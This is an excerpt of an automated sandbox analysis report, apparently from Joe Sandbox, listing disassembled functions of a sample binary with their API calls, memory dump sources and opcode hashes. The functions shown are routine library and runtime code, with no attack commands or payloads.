                                                                      Function 007D081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 007D0836
                                                                      • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,007CF2D8,Crypt32.dll,00000000,007CF35C,?,?,007CF33E,?,?,?), ref: 007D0858
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: DirectoryLibraryLoadSystem
                                                                      • String ID:
                                                                      • API String ID: 1175261203-0
                                                                      • Opcode ID: 8eac91377841591358bf9c271295d7cd7c111c340b0b3c8d6a428b1dd702a78f
                                                                      • Instruction ID: dd2066cfe3817034ceca59b6e14036a9b67ac652a59e4a4a1b13deb4c028f68c
                                                                      • Opcode Fuzzy Hash: 8eac91377841591358bf9c271295d7cd7c111c340b0b3c8d6a428b1dd702a78f
                                                                      • Instruction Fuzzy Hash: 37E04876500118ABDF11A794DC09FEB77ACEF093D1F0440667649D2104DA78DA84CBF4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DA3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 007DA3DA
                                                                      • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 007DA3E1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: BitmapCreateFromGdipStream
                                                                      • String ID:
                                                                      • API String ID: 1918208029-0
                                                                      • Opcode ID: e9bc8ad71996bd8aea61ce54ca0f5ba74f64e4e4a06b8400ab88766b5967b6a8
                                                                      • Instruction ID: f0ec76f47edc8ad94d0482b5776569bf521d1652f2871e3af538ca2c42d4797c
                                                                      • Opcode Fuzzy Hash: e9bc8ad71996bd8aea61ce54ca0f5ba74f64e4e4a06b8400ab88766b5967b6a8
                                                                      • Instruction Fuzzy Hash: D2E0EDB1504218EBCB10EF55C545B9DBBF8EB14360F10805BA88697341E378BF04DBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007E2B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007E2BAA
                                                                      • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 007E2BB5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                      • String ID:
                                                                      • API String ID: 1660781231-0
                                                                      • Opcode ID: 6bc99a997232f6178d6caff00903e74e36cc538691f2c3cf76cf9ef2cec48ba3
                                                                      • Instruction ID: 9c1ebaf1c7f8bfcdbee0e36d09166b5ed2c00e3b11f118921429e40a6dc0c43b
                                                                      • Opcode Fuzzy Hash: 6bc99a997232f6178d6caff00903e74e36cc538691f2c3cf76cf9ef2cec48ba3
                                                                      • Instruction Fuzzy Hash: 59D0A7F41562C0648C546A73280E464234EAD497747A04696E4208A4D3FE5D90829025
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007C12F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ItemShowWindow
                                                                      • String ID:
                                                                      • API String ID: 3351165006-0
                                                                      • Opcode ID: 90867909690a77a5ad399da3883c3ab4c6015bb5e1c6b3a5182c4c704067e74d
                                                                      • Instruction ID: d452d340ab3418e4dfc1305d401ca5e9443f1f70943231c669d002c0dedcaac4
                                                                      • Opcode Fuzzy Hash: 90867909690a77a5ad399da3883c3ab4c6015bb5e1c6b3a5182c4c704067e74d
                                                                      • Instruction Fuzzy Hash: EAC0123205C200BECB020BB4DC29C2BBBA8BBA5312F04C908B0A5C0060C23CC220DF11
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007C1A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: cf495c199562fe8c83ed487d9edac92abbf5e290bf9ef007ec89c71283d89b00
                                                                      • Instruction ID: b9a6d4fdce6c0e4f713c0a3330cf31e03d6880b02fa169c1f18643b8e4e26bee
                                                                      • Opcode Fuzzy Hash: cf495c199562fe8c83ed487d9edac92abbf5e290bf9ef007ec89c71283d89b00
                                                                      • Instruction Fuzzy Hash: 9BC19F70A002549BEF25CF68C498FB97BA5AF06310F4841BDEC469B397DB389D54CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007C3BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: 62fc5e81da9a2f8c1b1c12424fafce96314e898a21ffb044a094a065d0c38379
                                                                      • Instruction ID: 6f1512dcb8a13c5e946f633e9eaf682ffae3576b94e674480de3882fa18e57d7
                                                                      • Opcode Fuzzy Hash: 62fc5e81da9a2f8c1b1c12424fafce96314e898a21ffb044a094a065d0c38379
                                                                      • Instruction Fuzzy Hash: DA71C471500F44DEDB35DB74C855EEBB7E5AF15301F40492EE2AB87242DA3A6A84CF11
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007C8284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 007C8289
                                                                        • Part of subcall function 007C13DC: __EH_prolog.LIBCMT ref: 007C13E1
                                                                        • Part of subcall function 007CA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 007CA598
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog$CloseFind
                                                                      • String ID:
                                                                      • API String ID: 2506663941-0
                                                                      • Opcode ID: 7679c647c1784cf7c4f252f041abb0c59cbde0f9376a459285a0c4a01698521f
                                                                      • Instruction ID: bd17b97a152ed50860fffcabb8799fcca465e44385d1e56be1e041c296b1e703
                                                                      • Opcode Fuzzy Hash: 7679c647c1784cf7c4f252f041abb0c59cbde0f9376a459285a0c4a01698521f
                                                                      • Instruction Fuzzy Hash: F34174719446589ADB24EB60CC59FEDB778AF00304F4404EFE18A97183EB795F85CB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007C13E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 007C13E1
                                                                        • Part of subcall function 007C5E37: __EH_prolog.LIBCMT ref: 007C5E3C
                                                                        • Part of subcall function 007CCE40: __EH_prolog.LIBCMT ref: 007CCE45
                                                                        • Part of subcall function 007CB505: __EH_prolog.LIBCMT ref: 007CB50A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: 56a21d364cb228685e1836ed06763daeb7d57aa33184fc58cf1011d0d0352be2
                                                                      • Instruction ID: 2de446d649a6d56a8cefdfdf6eef747cb041a4a19b4422c8a83c24f05b972f1c
                                                                      • Opcode Fuzzy Hash: 56a21d364cb228685e1836ed06763daeb7d57aa33184fc58cf1011d0d0352be2
                                                                      • Instruction Fuzzy Hash: 814136B0905B40DEE724DF798889AE6FBE5BF19300F50493EE5EE87282CB356654CB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007C13DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 007C13E1
                                                                        • Part of subcall function 007C5E37: __EH_prolog.LIBCMT ref: 007C5E3C
                                                                        • Part of subcall function 007CCE40: __EH_prolog.LIBCMT ref: 007CCE45
                                                                        • Part of subcall function 007CB505: __EH_prolog.LIBCMT ref: 007CB50A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: 3e1654117fde188dfdee8a1f0dd70bde534a7f3e2bb373501df2ff7938edfe24
                                                                      • Instruction ID: b373954b7fd871d61a90a012db405f63789697489265f86fc78b798a7074d756
                                                                      • Opcode Fuzzy Hash: 3e1654117fde188dfdee8a1f0dd70bde534a7f3e2bb373501df2ff7938edfe24
                                                                      • Instruction Fuzzy Hash: C94136B0905B40DAE724DF798889AE6FBE5BF19300F50492EE5FE87282CB356654CB10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007D359E Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: bc896701a9e6079d5dfb714a5ddb75acf20f3ad16447b5bc03dce23c2ab802f7
                                                                      • Instruction ID: 9521003f41e993ffa7940d6591df327545a98a70701325107d711f2d15829fe9
                                                                      • Opcode Fuzzy Hash: bc896701a9e6079d5dfb714a5ddb75acf20f3ad16447b5bc03dce23c2ab802f7
                                                                      • Instruction Fuzzy Hash: 332104B1E40211ABDB14AF74CC45A6A7778FB18714F04053BE506EB782D378DA00C6A9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DB093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 007DB098
                                                                        • Part of subcall function 007C13DC: __EH_prolog.LIBCMT ref: 007C13E1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: 46bc0bb02841a4d8d0f0e60e98eb9b5333b112d36f2d82f3566235c75c81de92
                                                                      • Instruction ID: f47704236eae0890629096c67cfa8ebe79cd5387a25d77a123a7a7028bdeb96c
                                                                      • Opcode Fuzzy Hash: 46bc0bb02841a4d8d0f0e60e98eb9b5333b112d36f2d82f3566235c75c81de92
                                                                      • Instruction Fuzzy Hash: 7B317E71C01249EACF15DFA5C855AEEBBB4AF09304F5044AFE409B7342DB39AE04CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007EAC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 007EACF8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc
                                                                      • String ID:
                                                                      • API String ID: 190572456-0
                                                                      • Opcode ID: 3fc984c4d653477401db064c5d2c56ef6d3644215c2005bb4821c5cb0d5e369f
                                                                      • Instruction ID: dd2045d14f75e296d7733d61ba86eb4d3185141d7c4eedbae956bd6fbc931e19
                                                                      • Opcode Fuzzy Hash: 3fc984c4d653477401db064c5d2c56ef6d3644215c2005bb4821c5cb0d5e369f
                                                                      • Instruction Fuzzy Hash: B911CD337025657F9B25DE2ADC5056A7395AB887607268120FD15EB274D738FC01C7E2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007C9215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: f41d047cd0cc50803797f89bc69f4ed64182aa12a9fa35fed708767748c02a47
                                                                      • Instruction ID: b8b0521e34942b3dbaa6fdd4d266f90e37a45539d9be8d8ce4af2280a7ba6aa6
                                                                      • Opcode Fuzzy Hash: f41d047cd0cc50803797f89bc69f4ed64182aa12a9fa35fed708767748c02a47
                                                                      • Instruction Fuzzy Hash: 32017333900968EBCF21AB68C849EDEB735BF88740B01412DE952B7212DA3C9D1086A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007E3C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 007E3C3F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc
                                                                      • String ID:
                                                                      • API String ID: 190572456-0
                                                                      • Opcode ID: a0b9cd25462dfaf3263a4b4e320992ab88dfd3904aadcef176684b6625e770e2
                                                                      • Instruction ID: afa7df744d63d5d812647057d9367e2775f9ec2549f774e0f5acf6c09139e675
                                                                      • Opcode Fuzzy Hash: a0b9cd25462dfaf3263a4b4e320992ab88dfd3904aadcef176684b6625e770e2
                                                                      • Instruction Fuzzy Hash: AAF0EC32202256AFDF114E6AEC089AA779AFF0DB217204125FA05E71E0DB35DA20C7A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007E8E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(00000000,?,?,?,007E4286,?,0000015D,?,?,?,?,007E5762,000000FF,00000000,?,?), ref: 007E8E38
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: 7b3599e62bb4758f708f5f400ba38f85c5ee456483229821462a99f3095c665b
                                                                      • Instruction ID: 16f3f41ab1e6b7db100dfd2675366359065d1929ee1bab0d0f163745e72e1302
                                                                      • Opcode Fuzzy Hash: 7b3599e62bb4758f708f5f400ba38f85c5ee456483229821462a99f3095c665b
                                                                      • Instruction Fuzzy Hash: 45E06D322072E5A6EAF527779D09B9B7649AB4E7A4F194161AC1C97091CF6CCC0182E3
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007C5ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 007C5AC2
                                                                        • Part of subcall function 007CB505: __EH_prolog.LIBCMT ref: 007CB50A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
